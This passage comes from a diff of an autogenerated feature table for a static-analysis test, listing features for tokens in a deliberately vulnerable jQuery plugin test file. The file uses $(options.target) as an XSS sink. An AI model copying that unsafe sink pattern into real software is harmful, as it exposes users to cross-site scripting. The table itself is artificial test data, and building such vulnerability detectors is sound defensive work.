options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | 'arguments' object of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | 'arguments' object of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | 'arguments' object of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | exceptional return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | exceptional return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | exceptional return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | exceptional return of function my_plugin | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | functio ... OK\\n\\t\\t} | CalleeFlexibleAccessPath | $.extend | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | functio ... OK\\n\\t\\t} | InputAccessPathFromCallee | 1.my_plugin | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | functio ... OK\\n\\t\\t} | InputArgumentIndex | 1 | @@ -24006,159 +156935,1042 @@ tokenFeatures | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | functio ... OK\\n\\t\\t} | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | functio ... OK\\n\\t\\t} | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | functio ... OK\\n\\t\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:23:126:31 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:23:126:31 | my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:23:126:31 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:23:126:31 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:33:126:39 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:33:126:39 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:33:126:39 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:33:126:39 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:33:126:39 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:33:126:39 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:33:126:39 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:33:126:39 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:4:127:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:4:127:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:4:127:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:4:127:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:4:127:20 | $(options.target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:4:127:20 | $(options.target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:4:127:20 | $(options.target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:4:127:20 | $(options.target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:4:127:20 | exceptional return of $(options.target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:4:127:20 | exceptional return of $(options.target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:4:127:20 | exceptional return of $(options.target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:4:127:20 | exceptional return of $(options.target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:6:127:12 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:6:127:12 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:6:127:12 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:6:127:12 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:6:127:19 | options.target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:6:127:19 | options.target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:6:127:19 | options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:6:127:19 | options.target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:6:127:19 | options.target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:6:127:19 | options.target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:14:127:19 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:14:127:19 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:14:127:19 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:127:14:127:19 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:131:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:131:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:131:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:131:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:131:5 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:131:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:131:5 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:131:5 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:131:11 | $.fn.affix | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:131:11 | $.fn.affix | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:131:11 | $.fn.affix | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:131:11 | $.fn.affix | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:133:2 | $.fn.af ... T OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:133:2 | $.fn.af ... T OK\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:133:2 | $.fn.af ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:2:133:2 | $.fn.af ... T OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:4:131:5 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:4:131:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:4:131:5 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:4:131:5 | fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:7:131:11 | affix | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:7:131:11 | affix | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:7:131:11 | affix | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:7:131:11 | affix | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:131:14 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:131:14 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:131:14 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:131:14 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | 'arguments' object of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | 'arguments' object of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | 'arguments' object of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | 'arguments' object of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | exceptional return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | exceptional return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | exceptional return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | exceptional return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | functio ... T OK\\n\\t} | assignedToPropName | affix | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | functio ... T OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | functio ... T OK\\n\\t} | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | functio ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | functio ... T OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:15:133:2 | return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:24:131:32 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:24:131:32 | my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:24:131:32 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:24:131:32 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:34:131:40 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:34:131:40 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:34:131:40 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:34:131:40 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:34:131:40 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:34:131:40 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:34:131:40 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:131:34:131:40 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:3:132:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:3:132:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:3:132:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:3:132:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:3:132:19 | $(options.target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:3:132:19 | $(options.target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:3:132:19 | $(options.target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:3:132:19 | $(options.target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:3:132:19 | exceptional return of $(options.target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:3:132:19 | exceptional return of $(options.target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:3:132:19 | exceptional return of $(options.target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:3:132:19 | exceptional return of $(options.target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:5:132:11 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, 